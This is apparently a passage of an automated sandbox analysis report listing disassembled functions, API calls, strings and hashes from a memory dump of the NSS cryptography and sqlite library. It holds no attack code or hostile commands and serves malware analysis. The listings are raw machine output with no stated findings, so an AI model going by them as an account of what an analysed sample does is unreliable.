free.MOZGLUE(00000000), ref: 6C698EFD
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C698F11
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C698F1C

Strings

tFVPj, xrefs: 6C698EC4

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena_Item_$Free$AlgorithmAlloc_ArenaCopyEncodeFindTag_$ErrorZfree$Integer_$GenerateHashInitK11_LockPoolRandomResultTypecallocfree
String ID: tFVPj
API String ID: 2709086113-199373283
Opcode ID: 7e22e91afeb61a20a2ac314be7c70c54db70f7a20fc073c8b2de805d00f37c62
Instruction ID: c3bf7afd45079f8c2d990051dc994dbbd54ecf962c69087ab21d2cddbba4fb09
Opcode Fuzzy Hash: 7e22e91afeb61a20a2ac314be7c70c54db70f7a20fc073c8b2de805d00f37c62
Instruction Fuzzy Hash: 41D118B19053029BE7108F24DC80BAB77E8EF5A348F14452AEC54C66A1F734D959C7AF

Function 6C6BAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C6BACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C6BACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C6BACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C6BAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C6BADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6BADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6BADF0

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6BB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6BB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6BB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6BB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C6BB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6BB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6BB40C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 4134caf94f91c36ffc25a8402a65d21032f80c7b25c2e30ab3c2ea9ce8a0ecc5
Instruction ID: 55dc86e3d85ddee7acbb1eb7ab738f2044b414fd00b935375330946e1411942d
Opcode Fuzzy Hash: 4134caf94f91c36ffc25a8402a65d21032f80c7b25c2e30ab3c2ea9ce8a0ecc5
Instruction Fuzzy Hash: 7922B171904301AFE710CF14CC84BAA77E1AF8530CF14857CE9596B792E772E869CB9A

Function 6C63ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C63ED38

Part of subcall function 6C5D4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5D4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C63EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C63EFE4

Part of subcall function 6C6FDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C5D5001,?,00000003,00000000), ref: 6C6FDFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C63F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C63F129
sqlite3_mprintf.NSS3(optimize), ref: 6C63F1D1
sqlite3_free.NSS3(?), ref: 6C63F368

Strings

unicode61, xrefs: 6C63EDB5
fts3_tokenizer, xrefs: 6C63EE1A, 6C63EEA8
fts3, xrefs: 6C63F247
fts3tokenize, xrefs: 6C63F30F
porter, xrefs: 6C63ED97
matchinfo, xrefs: 6C63F04F, 6C63F082, 6C63F0C2, 6C63F0F2, 6C63F124, 6C63F169
optimize, xrefs: 6C63F199, 6C63F1CC, 6C63F211
simple, xrefs: 6C63ED79
fts4aux, xrefs: 6C63ECF9
offsets, xrefs: 6C63EFAF, 6C63EFDF, 6C63F01F
fts4, xrefs: 6C63F2AD
snippet, xrefs: 6C63EF05, 6C63EF37, 6C63EF7C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 3b0a0153f6b9bcb47ffcc7e222f1437bb33de304c53cbc5955d32129c8d06625
Instruction ID: cc0f7ecc91408ca7f261660d5079c40279b2af3e1c88b45207b63b79cf0c7994
Opcode Fuzzy Hash: 3b0a0153f6b9bcb47ffcc7e222f1437bb33de304c53cbc5955d32129c8d06625
Instruction Fuzzy Hash: E002E2B2B047108BE7049F72AC9572B36B2AFC5308F14653CD95E87B01EB75E846879B

Function 6C68EA00 Relevance: 28.8, APIs: 19, Instructions: 304COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6C698C9F,00000000,00000000,?), ref: 6C68EA29

Part of subcall function 6C6B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B08B4

SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,000000A0,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6C698C9F), ref: 6C68EB01
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6C77C6C4), ref: 6C68EB28
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C68EBC6
SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C68EBDE
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C68EBEB
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000010,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,6C698C9F), ref: 6C68EC17
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C68EC2F
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C68EC4B
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,6C77C754), ref: 6C68EC6D
free.MOZGLUE(?), ref: 6C68EC7F
free.MOZGLUE(00000000), ref: 6C68EC90
free.MOZGLUE(?), ref: 6C68ECA1
free.MOZGLUE(00000000), ref: 6C68ECBF
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C68ECD4
SECOID_CopyAlgorithmID_Util.NSS3(?,?,00000000), ref: 6C6991D5
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6C6991E8
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C6991F2
free.MOZGLUE(00000000), ref: 6C6991FB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Encode$Item_free$Integer_Unsigned$Zfree$Algorithm$CopyErrorFindTag_
String ID:
API String ID: 899953378-0
Opcode ID: 1a55302265ce68efcfd5b81a90f96285befdd088a23c5b1eb582301aa3d463ce
Instruction ID: dcfcfb8a7bd3e2183e56fa6d3815485bba0a701883058bea2b639882d6a5e1cc
Opcode Fuzzy Hash: 1a55302265ce68efcfd5b81a90f96285befdd088a23c5b1eb582301aa3d463ce
Instruction Fuzzy Hash: D3A1F779F021056BEF00CAA9DD81BBE7368EB45748F200439E826D7B80E665D94587EB

Function 6C6CC8C0 Relevance: 25.9, APIs: 17, Instructions: 432COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6CCA51
TlsGetValue.KERNEL32 ref: 6C6CCAE8
EnterCriticalSection.KERNEL32(?), ref: 6C6CCAFC
PK11_FreeSymKey.NSS3(00000000), ref: 6C6CCB2E
PK11_KeyGen.NSS3(?,?,00000000,00000000,?), ref: 6C6CCB87
memset.VCRUNTIME140(?,00000000,00000410), ref: 6C6CCBA8
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C6CCCCD
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6CCCE1
PK11_PubDeriveWithKDF.NSS3 ref: 6C6CCD3D
memcpy.VCRUNTIME140(?,?,?), ref: 6C6CCD73
memcpy.VCRUNTIME140(?,?,?), ref: 6C6CCD9D
PK11_WrapSymKey.NSS3(?,00000000,?,00000000,?), ref: 6C6CCDDA
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C6CCE04
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C6CCE17
PK11_FreeSymKey.NSS3(00000000), ref: 6C6CCE24
PR_Unlock.NSS3 ref: 6C6CCE49
PK11_FreeSymKey.NSS3(00000000), ref: 6C6CCE96

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_$ErrorFree$Destroymemcpy$CriticalDeriveEnterPrivatePublicSectionUnlockValueWithWrapmemset
String ID:
API String ID: 3685077037-0
Opcode ID: a828c64c73589c913f43eae066b06ed065c477051a7b149f16aaedd51413672e
Instruction ID: 3d7f2f572279b1c965f66f972cc7998493b8683a047957fc66da914b9acdf1ba
Opcode Fuzzy Hash: a828c64c73589c913f43eae066b06ed065c477051a7b149f16aaedd51413672e
Instruction Fuzzy Hash: B8F1C3B1E00215ABEB10EF59CC847AA73B4EF45348F1441B9D90AA7B41E734DA85CB9F

Function 6C680BA0 Relevance: 25.7, APIs: 17, Instructions: 242memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE0B3,00000000), ref: 6C680BFA

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C680C18
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C680C2E
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C680C39
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C680C45
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C680CC1
PORT_Alloc_Util.NSS3(?), ref: 6C680CDA
memcpy.VCRUNTIME140(?,?,?), ref: 6C680D1B
PK11_GenerateKeyPairWithOpFlags.NSS3 ref: 6C680D79
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C680DB2
PK11_CreateContextBySymKey.NSS3(?,82000104,?,?), ref: 6C680DE4
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C680DFE
PR_SetError.NSS3(FFFFE064,00000000), ref: 6C680E2C
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C680E38
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C680E44
free.MOZGLUE(?), ref: 6C680E7E
free.MOZGLUE(?), ref: 6C680EAE

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DestroyError$K11_$ContextPrivatePublicUtilfree$Alloc_CreateFindFlagsGeneratePairTag_ValueWithmemcpy
String ID:
API String ID: 2510822978-0
Opcode ID: 5df519ee4a581b85ca5508af7861e767cbda222f4590e0e4bb07f73dff657107
Instruction ID: efba5a904428d28c78feb9ef7ce33d54d5581d088429748d2bd1bb2e49e9f6ee
Opcode Fuzzy Hash: 5df519ee4a581b85ca5508af7861e767cbda222f4590e0e4bb07f73dff657107
Instruction Fuzzy Hash: 439116B1906340AFD7109F69DC4474BBBE4BF85308F14892CF89997B51E731E944CBAA

Function 6C64EF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64EF63

Part of subcall function 6C6587D0: PORT_NewArena_Util.NSS3(00000800,6C64EF74,00000000), ref: 6C6587E8
Part of subcall function 6C6587D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C64EF74,00000000), ref: 6C6587FD
Part of subcall function 6C6587D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C65884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C64F2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64F2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C64F30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C64F374
PL_strcasecmp.NSS3(6C792FD4,?), ref: 6C64F457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C64F4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C64F66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C64F67D
CERT_DestroyName.NSS3(?), ref: 6C64F68B

Part of subcall function 6C658320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C658338
Part of subcall function 6C658320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C658364
Part of subcall function 6C658320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C65838E
Part of subcall function 6C658320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6583A5
Part of subcall function 6C658320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6583E3

Part of subcall function 6C6584C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C6584D9
Part of subcall function 6C6584C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C658528

Part of subcall function 6C658900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C64F599,?,00000000), ref: 6C658955

Strings

oid., xrefs: 6C64F2CF
*, xrefs: 6C64F3C6
", xrefs: 6C64F21B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 22598b37596162ae80155a1fda50ee85aca069fdb968bfe1a9d20cb25e0c41ad
Instruction ID: e18ea9ed9a6248c5d47b41839ea4c31155bce88e10ac59415f4bc707a349553f
Opcode Fuzzy Hash: 22598b37596162ae80155a1fda50ee85aca069fdb968bfe1a9d20cb25e0c41ad
Instruction Fuzzy Hash: E122167160C3418FD714DE68C4907ABB7E6ABC531CF18CA2EE49587B91E7319805CB9B

Function 6C6BEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6BDAE2,?), ref: 6C6BC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6BF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6BF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C6BF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6BF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C78218C), ref: 6C6BF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C6BF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6BF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C6BF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C6BF210

Part of subcall function 6C6652D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C6BF1E9,?,00000000,?,?), ref: 6C6652F5
Part of subcall function 6C6652D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C66530F
Part of subcall function 6C6652D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C665326
Part of subcall function 6C6652D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C6BF1E9,?,00000000,?,?), ref: 6C665340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6BF227

Part of subcall function 6C6AFAB0: free.MOZGLUE(?,-00000001,?,?,6C64F673,00000000,00000000), ref: 6C6AFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C6BF23E

Part of subcall function 6C6ABE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C65E708,00000000,00000000,00000004,00000000), ref: 6C6ABE6A
Part of subcall function 6C6ABE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6604DC,?), ref: 6C6ABE7E
Part of subcall function 6C6ABE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C6ABEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6BF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C6BF3A8

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C6BF3B3

Part of subcall function 6C662D20: PK11_DestroyObject.NSS3(?,?), ref: 6C662D3C
Part of subcall function 6C662D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C662D5F

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 1c2e0493dd797767a4bcf1d1609de8033d9289cb4044825862a6fa28dabf5087
Instruction ID: 80cf96fd84a0ed2bac78895a38815606644b0437fb28ebfd1a2cf66311502bd0
Opcode Fuzzy Hash: 1c2e0493dd797767a4bcf1d1609de8033d9289cb4044825862a6fa28dabf5087
Instruction Fuzzy Hash: 9AD180B9E016059FDB10CF99D880A9EB7F5EF48308F148429D915B7721EB31E816CB99

Function 6C69A9A0 Relevance: 21.2, APIs: 14, Instructions: 214COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C69A9CA

Part of subcall function 6C6B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1000
Part of subcall function 6C6B0FF0: PR_NewLock.NSS3(?,00000800,6C64EF74,00000000), ref: 6C6B1016
Part of subcall function 6C6B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6587ED,00000008,?,00000800,6C64EF74,00000000), ref: 6C6B102B

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6C7B0B04,?), ref: 6C69A9F7

Part of subcall function 6C6AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7818D0,?), ref: 6C6AB095

PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C69AA0B
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C69AA33
PK11_GetInternalKeySlot.NSS3 ref: 6C69AA55
PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6C69AA69
PORT_FreeArena_Util.NSS3(00000001,00000001), ref: 6C69AAD4
PK11_ListFixedKeysInSlot.NSS3(?,00000000,?), ref: 6C69AB18
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C69AB5A
PK11_FreeSymKey.NSS3(00000000), ref: 6C69AB85
PK11_FreeSymKey.NSS3(00000000), ref: 6C69AB99
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C69ABDC
PK11_FreeSymKey.NSS3(?), ref: 6C69ABE9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C69ABF7

Part of subcall function 6C69AC10: PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C69AB3E,?,?,?), ref: 6C69AC35
Part of subcall function 6C69AC10: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C69AB3E,?,?,?), ref: 6C69AC55
Part of subcall function 6C69AC10: PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C69AB3E,?,?), ref: 6C69AC70
Part of subcall function 6C69AC10: PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C69AC92
Part of subcall function 6C69AC10: PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C69AB3E), ref: 6C69ACD7

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_$Util$Free$Arena_Item_$Zfree$ArenaContextSlot$Alloc_AuthenticateBlockCipherCreateDecodeDestroyErrorFixedInitInternalKeysListLockPoolQuickSizecalloc
String ID:
API String ID: 2602994911-0
Opcode ID: 2a70f5618e92545ed6281ebef3fcdcb9b119eb10236508aff193c3ebf48f1f6a
Instruction ID: f16468c0789725066c363819e8993556538c386b81923e8a2b182093cc4bbcd0
Opcode Fuzzy Hash: 2a70f5618e92545ed6281ebef3fcdcb9b119eb10236508aff193c3ebf48f1f6a
Instruction Fuzzy Hash: DA7105B1E083029BD700CF249D40B9BB3E5AF86358F104A29FD6497752FB71D948C79A

Function 6C5DECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5DED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5DEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5DEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C5DEF98

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5DF483
%s at line %d of [%.10s], xrefs: 6C5DF492
database corruption, xrefs: 6C5DF48D

Memory Dump Source

